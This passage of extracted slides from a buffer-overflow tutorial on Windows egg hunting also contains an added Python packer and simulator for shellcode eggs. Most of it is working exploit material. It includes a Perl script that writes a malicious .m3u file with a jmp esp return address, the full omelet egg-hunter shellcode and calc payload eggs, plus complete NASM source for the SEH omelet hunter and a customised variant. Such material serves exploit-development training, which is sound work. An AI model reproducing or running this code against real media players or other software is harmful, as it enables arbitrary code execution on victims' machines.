egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
```
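Added example, not part of the slides and not Skylined's tool: a Python packer that lays shellcode out as omelet eggs with the same header the tool emits above, and a Python model of what the 82-byte omelet stage does with them, covering both the "how does it work" slides and the conversion step. The header layout is taken from the egg0/egg1/egg2 bytes above (payload length 0x7A, index byte 0xFF minus the index, marker little-endian); the stage's behaviour is my reading of its bytes (repne scasb for the length byte, xor with 0xBADA55FF to recover the index, cmp/ja to reject out-of-range indexes, rep movsb to index × 122 from the stack bottom, execution only after the whole user-space scan). The function names, the 303-byte filler standing in for the calc shellcode, and the memory image with a decoy, a duplicate and out-of-order eggs are all constructed here.

```python
import struct

EGG_SIZE = 127      # egg size given to w32_SEH_omelet.py on the slide (legal range 6..127)
MARKER = 0xBADA55   # marker given on the slide
HEADER_LEN = 5      # [payload length][0xFF - index][marker, 3 bytes little-endian]
PAD_BYTE = 0x40     # the tool pads the last egg with 0x40 ('@', inc eax on x86)


def make_eggs(shellcode, egg_size=EGG_SIZE, marker=MARKER):
    """Split shellcode into eggs laid out like the tool output: a 5-byte header
    followed by egg_size - 5 payload bytes, the last egg padded with PAD_BYTE."""
    if not 6 <= egg_size <= 127:
        raise ValueError("egg size must be between 6 and 127")
    if not 0 <= marker <= 0xFFFFFF:
        raise ValueError("marker must fit in three bytes")
    payload_len = egg_size - HEADER_LEN
    marker_le = struct.pack("<I", marker)[:3]
    eggs = []
    for index, offset in enumerate(range(0, len(shellcode), payload_len)):
        if index > 0xFF:
            raise ValueError("too many eggs: the index must fit in one byte")
        chunk = shellcode[offset:offset + payload_len]
        chunk = chunk.ljust(payload_len, bytes([PAD_BYTE]))
        # The index is stored as 0xFF - index: xoring the header dword with
        # (marker << 8 | 0xFF) then yields the plain index, which is what the stage does.
        eggs.append(bytes([payload_len, 0xFF - index]) + marker_le + chunk)
    return eggs


def omelet_hunt(memory, egg_count, egg_size=EGG_SIZE, marker=MARKER):
    """Model of the stage's loop over a memory image (bytes standing in for user
    space). Scan for the payload-length byte, turn the next dword into an index,
    drop candidates whose index is out of range, and copy the payload to
    index * payload_len in the reconstruction area (the stage uses the stack
    bottom, fs:[8]). The stage executes the area only after the whole scan, so
    eggs may appear in any order and any number of times. Returns the area and
    the set of indexes never seen; the stage itself never checks for that."""
    payload_len = egg_size - HEADER_LEN
    key = (marker << 8) | 0xFF
    area = bytearray(payload_len * egg_count)
    seen = set()
    pos = memory.find(bytes([payload_len]))
    while pos != -1 and pos + egg_size <= len(memory):
        index = struct.unpack_from("<I", memory, pos + 1)[0] ^ key
        if index < egg_count:
            start = index * payload_len
            area[start:start + payload_len] = memory[pos + HEADER_LEN:pos + egg_size]
            seen.add(index)
            pos += egg_size        # resume just after the egg (mov edi, esi)
        else:
            pos += 1               # a stray length byte: keep scanning behind it
        pos = memory.find(bytes([payload_len]), pos)
    return bytes(area), set(range(egg_count)) - seen


# Constructed stand-in for the 303-byte calc shellcode on the slide (same length,
# so it also packs into three 127-byte eggs with 63 padding bytes in the last one).
SHELLCODE = bytes((i * 37 + 11) & 0xFF for i in range(303))
EGGS = make_eggs(SHELLCODE)


def build_memory_image():
    """Constructed memory image: eggs out of order, egg 1 twice, a decoy that has
    the length byte but a wrong marker, and filler text in between."""
    filler = b"This is a bunch of garbage" * 10
    decoy = bytes([EGG_SIZE - HEADER_LEN]) + b"\xFF\x11\x22\x33" + b"\x00" * 130
    return filler + EGGS[2] + filler + decoy + EGGS[1] + filler + EGGS[0] + EGGS[1] + filler


def demo():
    """True when the reassembled area starts with the original shellcode."""
    rebuilt, missing = omelet_hunt(build_memory_image(), len(EGGS))
    return rebuilt[:len(SHELLCODE)] == SHELLCODE and not missing


if __name__ == "__main__":
    print("egg headers:", [egg[:5].hex() for egg in EGGS], "reassembled ok:", demo())
```

The model stops at the end of the image where the real stage stops at the end of user space (the js after or ax, 0xFFF / inc eax). Two points carry over to the real thing: a stray 0x7A byte costs nothing because the marker check rejects it, and a missing egg is never detected, so the tool's remark that each egg must be present at least once is a hard requirement, not advice.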
![Page 60: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/60.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP (Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25;
my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
"\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
"\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
"\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
"\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
"\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50".
"\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33".
"\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42".
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30".
"\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45".
"\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31".
"\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59".
"\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43".
"\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55".
"\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44".
"\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C".
"\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51".
"\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30".
"\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38".
"\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D".
"\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37".
"\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40".
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
open($FILE,">$file");
print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3;
close($FILE);
print "m3u File Created successfully\n";
![Page 61: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/61.jpg)
An access violation occurs (Access violation when reading [00000000])
![Page 62: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/62.jpg)
w32_SEH_omelet.asm / shellcode analysis (the exploit script from slide 60 is repeated here with callouts)
jump to shell code
omit…
![Page 63: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/63.jpg)
w32_SEH_omelet.asm / shellcode analysis (the exploit script from slide 60 is repeated here with callouts)
omit… omelet code for finding eggs
for nop sled
![Page 64: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/64.jpg)
w32_SEH_omelet.asm / shellcode analysis (the exploit script from slide 60 is repeated here with callouts)
omit… omelet code for finding eggs
for nop sled
EDI → 0x00000000
![Page 65: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/65.jpg)
start:
  XOR EDI, EDI                  ; EDI = 0: the scan starts at address 0
  jmp SHORT reset_stack

create_SEH_handler:
  PUSH ECX                      ; SEH_frames[0].nextframe == 0xFFFFFFFF
  MOV [FS:EAX], ESP             ; SEH_chain -> SEH_frames[0]
  CLD                           ; SCAN memory upwards from 0
scan_loop:
  MOV AL, egg_size              ; EAX = egg_size
  egg_size_location equ $-1 - $$
  REPNE SCASB                   ; Find the first byte
  PUSH EAX                      ; Save egg_size
  MOV ESI, EDI
  LODSD                         ; EAX = II M2 M3 M4
  XOR EAX, (marker << 8) + 0xFF ; EAX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
  marker_bytes_location equ $-3 - $$
  CMP EAX, BYTE max_index       ; Check if egg_index is <= max_index
  max_index_location equ $-1 - $$
  JA reset_stack                ; No -> This was not a marker, continue scanning
  POP ECX                       ; ECX = egg_size
  IMUL ECX                      ; EAX = egg_size * egg_index == egg_offset
                                ; EDX = 0 because ECX * EAX is always less than 0x1,000,000
  ADD EAX, [BYTE FS:EDX + 8]    ; EAX += Bottom of stack == position of egg in shellcode.
  XCHG EAX, EDI
copy_loop:
  REP MOVSB                     ; copy egg to basket
  MOV EDI, ESI                  ; EDI = end of egg

reset_stack:
  ; Reset the stack to prevent problems caused by recursive SEH handlers and set
  ; ourselves up to handle any AVs we may cause by scanning memory:
  XOR EAX, EAX                  ; EAX = 0
  MOV ECX, [FS:EAX]             ; ECX = SEH_chain => SEH_frames[X]
find_last_SEH_loop:
  MOV ESP, ECX                  ; ESP = SEH_frames[X]
  POP ECX                       ; ECX = SEH_frames[X].next_frame
  CMP ECX, 0xFFFFFFFF           ; SEH_frames[X].next_frame == none ?
  JNE find_last_SEH_loop        ; No "X -= 1", check next frame
  POP EDX                       ; EDX = SEH_frames[0].handler
  CALL create_SEH_handler       ; SEH_frames[0].handler == SEH_handler

SEH_handler:
  POPA                          ; ESI = [ESP + 4] -> struct exception_info
  LEA ESP, [BYTE ESI+0x18]      ; ESP = struct exception_info->exception_address
  POP EAX                       ; EAX = exception address 0x????????
  OR AX, 0xFFF                  ; EAX = 0x?????FFF
  INC EAX                       ; EAX = 0x?????FFF + 1 -> next page
  JS done                       ; EAX > 0x7FFFFFFF ===> done
  XCHG EAX, EDI                 ; EDI => next page
  JMP reset_stack
done:
  XOR EAX, EAX                  ; EAX = 0
  CALL [BYTE FS:EAX + 8]        ; jump to the bottom of the stack, where the eggs were reassembled
EDI → 0x00000000
Access Violation
![Page 66: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/66.jpg)
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg1.bin"
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg2.bin"
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg3.bin"
egg1
egg2
egg3
![Page 67: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/67.jpg)
egg1 (0x000FDxxx)
egg2 (0x000FDxxx)
egg3 (0x000FDxxx)
![Page 68: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/68.jpg)
w32_SEH_omelet.asm / modified shell code 1
# original omelet code: starts with "\x31\xFF" (xor edi,edi), so the scan begins at address 0
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
"\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
"\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
"\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
"\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
"\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
# mov di,0x1F80 followed by seven "shl edi,1": EDI = 0x1F80 << 7 = 0xFC000
# (mov di only writes the low 16 bits, so this assumes the upper half of EDI is zero on entry)
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". "\xD1\xE7\xD1\xE7"; #0x1F80 shift x 7
# modified omelet code: "\x31\xFF" replaced by two NOPs so the scan starts at the EDI set up by $shlEDI
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
"\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
"\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
"\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
"\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
"\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
![Page 69: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/69.jpg)
w32_SEH_omelet.asm / modified shell code 1
![Page 70: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/70.jpg)
omit…
![Page 71: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/71.jpg)
w32_SEH_omelet.asm / modified shell code 1
![Page 72: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/72.jpg)
w32_SEH_omelet.asm / modified shell code 1
![Page 73: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/73.jpg)
![Page 74: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/74.jpg)
![Page 75: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/75.jpg)
w32_SEH_omelet.asm / modified shell code 1
![Page 76: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/76.jpg)
custom_w32_SEH_omelet.asm (only the changed parts are shown here)
marker    equ 0x280876
egg_size  equ 0x3
max_index equ 0x2
start:
  mov ebx, 0xffffffff-egg_size+1  ; EBX = 0xFFFFFFFD, incremented once per copied egg;
                                  ; fixed at assembly time from the equ above (not patched
                                  ; by w32_SEH_omelet.py), so egg_size doubles as the egg count
  jmp SHORT reset_stack

copy_loop:
  REP MOVSB                     ; copy egg to basket
  CMP EBX, 0xFFFFFFFF           ; all eggs collected?
  JE done                       ; yes -> run the assembled shellcode without scanning further
  INC EBX
  MOV EDI, ESI                  ; EDI = end of egg, keep scanning

done:
  XOR EAX, EAX                  ; EAX = 0
  CALL [BYTE FS:EAX + 8]        ; jump to the bottom of the stack, where the eggs were reassembled
![Page 77: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/77.jpg)
custom_w32_SEH_omelet.asm
BITS 32

; egg:
;   LL II M1 M2 M3 DD DD DD ... (LL * DD)
;   LL == Size of eggs (same for all eggs)
;   II == Index of egg (different for each egg)
;   M1,M2,M3 == Marker byte (same for all eggs)
;   DD == Data in egg (different for each egg)

; placeholder values: the db lines at the end record where they sit in the
; binary so that w32_SEH_omelet.py can patch in the real marker, max_index and egg_size
marker    equ 0x280876
egg_size  equ 0x3
max_index equ 0x2
start:
  mov ebx, 0xffffffff-egg_size+1  ; EBX = 0xFFFFFFFD, incremented once per copied egg;
                                  ; fixed at assembly time from the equ above (not patched),
                                  ; so egg_size doubles as the number of eggs to collect
  jmp SHORT reset_stack

create_SEH_handler:
  PUSH ECX                      ; SEH_frames[0].nextframe == 0xFFFFFFFF
  MOV [FS:EAX], ESP             ; SEH_chain -> SEH_frames[0]
  CLD                           ; SCAN memory upwards from 0
scan_loop:
  MOV AL, egg_size              ; EAX = egg_size
  egg_size_location equ $-1 - $$
  REPNE SCASB                   ; Find the first byte
  PUSH EAX                      ; Save egg_size
  MOV ESI, EDI
  LODSD                         ; EAX = II M2 M3 M4
  XOR EAX, (marker << 8) + 0xFF ; EAX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
  marker_bytes_location equ $-3 - $$
  CMP EAX, BYTE max_index       ; Check if egg_index is <= max_index
  max_index_location equ $-1 - $$
  JA reset_stack                ; No -> This was not a marker, continue scanning
  POP ECX                       ; ECX = egg_size
  IMUL ECX                      ; EAX = egg_size * egg_index == egg_offset
                                ; EDX = 0 because ECX * EAX is always less than 0x1,000,000
  ADD EAX, [BYTE FS:EDX + 8]    ; EAX += Bottom of stack == position of egg in shellcode.
  XCHG EAX, EDI
copy_loop:
  REP MOVSB                     ; copy egg to basket
  CMP EBX, 0xFFFFFFFF           ; all eggs collected?
  JE done                       ; yes -> run the assembled shellcode without scanning further
  INC EBX
  MOV EDI, ESI                  ; EDI = end of egg, keep scanning

reset_stack:
  ; Reset the stack to prevent problems caused by recursive SEH handlers and set
  ; ourselves up to handle any AVs we may cause by scanning memory:
  XOR EAX, EAX                  ; EAX = 0
  MOV ECX, [FS:EAX]             ; ECX = SEH_chain => SEH_frames[X]
find_last_SEH_loop:
  MOV ESP, ECX                  ; ESP = SEH_frames[X]
  POP ECX                       ; ECX = SEH_frames[X].next_frame
  CMP ECX, 0xFFFFFFFF           ; SEH_frames[X].next_frame == none ?
  JNE find_last_SEH_loop        ; No "X -= 1", check next frame
  POP EDX                       ; EDX = SEH_frames[0].handler
  CALL create_SEH_handler       ; SEH_frames[0].handler == SEH_handler

SEH_handler:
  POPA                          ; ESI = [ESP + 4] -> struct exception_info
  LEA ESP, [BYTE ESI+0x18]      ; ESP = struct exception_info->exception_address
  POP EAX                       ; EAX = exception address 0x????????
  OR AX, 0xFFF                  ; EAX = 0x?????FFF
  INC EAX                       ; EAX = 0x?????FFF + 1 -> next page
  JS done                       ; EAX > 0x7FFFFFFF ===> done
  XCHG EAX, EDI                 ; EDI => next page
  JMP reset_stack
done:
  XOR EAX, EAX                  ; EAX = 0
  CALL [BYTE FS:EAX + 8]        ; jump to the bottom of the stack, where the eggs were reassembled

; trailer read by w32_SEH_omelet.py: offsets of the three patchable fields
db marker_bytes_location
db max_index_location
db egg_size_location
![Page 78: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/78.jpg)
custom_w32_SEH_omelet.asm build
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>"c:\Program Files\nasm\nasm.exe" -f bin -o custom_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin shellcode.bin calceggs_custom.txt 127 0xBADA55
![Page 79: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/79.jpg)
custom_w32_SEH_omelet.asm
![Page 80: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/80.jpg)
custom_w32_SEH_omelet.asm
![Page 81: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/81.jpg)
custom_w32_SEH_omelet.asm
![Page 82: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/82.jpg)
custom_w32_SEH_omelet.asm
![Page 83: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/83.jpg)
Thank You :)
See you the week after next week